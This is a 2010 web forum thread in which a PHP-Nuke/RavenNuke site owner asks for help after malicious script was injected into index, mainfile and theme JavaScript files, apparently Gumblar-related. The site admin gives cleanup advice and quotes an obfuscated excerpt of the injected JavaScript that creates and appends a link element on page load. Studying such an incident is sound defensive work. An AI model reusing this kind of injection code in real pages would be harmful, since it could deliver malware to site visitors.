| Author |
Message |
hopper
New Member
Joined: Dec 05, 2007
Posts: 12
|
 Posted:
Thu Mar 04, 2010 5:30 pm |
|
Hello
I use RN 2.30.02
Yesterday my site went down. So I contacted my host and they rebooted the server. After the reboot everything seemed fine until I started seeing that some of my modules had no content in them, they were just blank. After checking the Index files of those files I saw that there was some scripts in all my index files at the bottom of the files.
At this moment I was saying to myself it has to be an IFRAME attack, because yes those modules that were not working did indeed have Iframe code in the index files.
I contacted my host that this could possibly be an IFRAME attack and asked them if they could check the log files to determine what was initially exploited. They wrote back to me:
Code:Going through your user(s)' auth logs I found the following which may be indicative of a password intrusion:
- - - - - - - - - - - - - - - - - - - - - - -
148 IPs have logged into user **** from 17 identified countries within the last 30 days, including:
38 209.59.153.63 (United States)
31 204.16.201.157 (Canada)
30 72.232.228.162 (United States)
30 74.3.223.163 (unknown)
29 68.168.212.6 (United States)
29 88.255.108.150 (Turkey)
27 72.55.156.176 (Canada)
26 89.255.3.230 (Netherlands)
26 195.149.74.155 (Germany)
26 70.85.33.82 (United States)
26 198.145.116.71 (United States)
25 68.233.4.27 (United States)
25 70.150.220.35 (United States)
25 69.46.29.14 (United States)
24 205.234.145.101 (United States)
24 173.45.101.162 (unknown)
24 208.87.240.143 (unknown)
23 216.120.255.109 (United States)
23 74.54.134.242 (unknown)
23 66.147.238.96 (United States)
The countries that have logged into your user are:
29 Turkey
27 Canada
26 Netherlands
21 unknown
20 Germany
19 Ukraine
18 France
18 Portugal
17 Russian Federation
17 United Kingdom
16 Sweden
16 Spain
15 Slovakia
15 Singapore
15 Romania
13 United States
12 Latvia
9 Macedonia, the Former Yugoslav Republic of
This may indicate that your password has been compromised.
|
They gave me some steps to follow, which I have done.
I scanned all PCs that connect to my host/ nothing found.
I changed my ftp password.
I changed my CP password.
I changed my Database password.
They told me to stop using ftp and use sftp/ssh instead(i didnt know ftp sends your password over the internet in text)
I have some questions. Did the intruder do a IFRAMe attack after they had gotten the password ? Or is this some other type of hack they added to my site ?
Is it safe to have my site open for visitors ?
I will now start replacing the files that were infected. However they told that usually the intruder will leave some type of file somewhere in my site so that they can re-exploit later ion down the line. I am having trouble finding this file.
Can this file be anywhere, like in a sub-domain, or hidden deep in any random folder ?
Also can I just remove the script code from the files or should I replace them with a aback up ?
Sorry for the wall of text and all the questions. If anyone needs the code that was added I will be glad to send it.
Thanks all for your time.
__Hopper___ |
| |
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
| Posted:
Sat Mar 06, 2010 12:04 am |
|
Without seeing the code I am unable to respond to what type of attack was used.
However, those IP's and/or countries (in and of themselves) do not constitute any reason to jump to the conclusion that your password has been compromised. I have seen many site attacks/break-ins w/o any compromise of a userid or password. Usually the break-in is a result of an insecure phpnuke application that allows uploads. Once the file is uploaded then most anything is possible. Are you using any applications that allow uploading? If so, that would be the first place that I would look. I would also scan your server logs for urls that contain the words del, delete, unlink, remove
Please email, to me, the code that you have found and I may be able to tell you more. |
| |
|
|
|
|
hopper
|
| Posted:
Sat Mar 06, 2010 1:34 pm |
|
Thanks for replying
Can you please PM me your Email address, I couldn't find it. I don't want to PM you the code and possibly get banned from the site. I don't think I allow uploads on my site, atleast that I know of.
I have had my site down because 2 members from my site told me their symantec was giving them a warning about a gumblar trojan...it wanted them to download a virus cleaner.
So far I have found the code in all index files, mainfile.php and in javascript files of my theme folder. I think I have got everything but I have been double and triple checking all the files, just to be sure.
Thanks |
| |
|
|
|
|
Raven
|
| Posted:
Sat Mar 06, 2010 2:18 pm |
|
Please email the code as a zip file attachment to
raven
__AT__
ravenphpscripts
__DOT__
com |
| |
|
|
|
|
hopper
|
| Posted:
Sat Mar 06, 2010 2:39 pm |
|
ok Thanks
I have sent you the email. |
| |
|
|
|
|
Raven
|
| Posted:
Sat Mar 06, 2010 6:08 pm |
|
Got it and will look at it as soon as I can. Thanks. |
| |
|
|
|
|
Raven
|
| Posted:
Sat Mar 06, 2010 6:39 pm |
|
Please email to me the URL for your site.
Also, for everyone's benefit, here is the result of the JS. This is just an excerpt. It assembles/creates a link and adds it via the DOM once the onload event fires.
Code: m=document.createElement(a);
var Qj=new String();
var HG;
if(HG!='' && HG!='Ur'){
HG=''
}; /** SEMI-COLON OUT OF PLACE **/
m[g]=[1,6][0];
var Ld='';
m[V]=kA;
var So=new Date();
var Qd='';
this.Fd="";
document.body.appendChild(m);
|
Here is what it all translates to/as:
BTW: Is your URL in that virus related url? |
| |
|
|
|
|
hopper
|
| Posted:
Mon Mar 08, 2010 10:00 pm |
|
Thanks for looking into this Raven.
No my site is not related to that URL or is not in that url.
I will Email you my URL right now.
Thanks |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
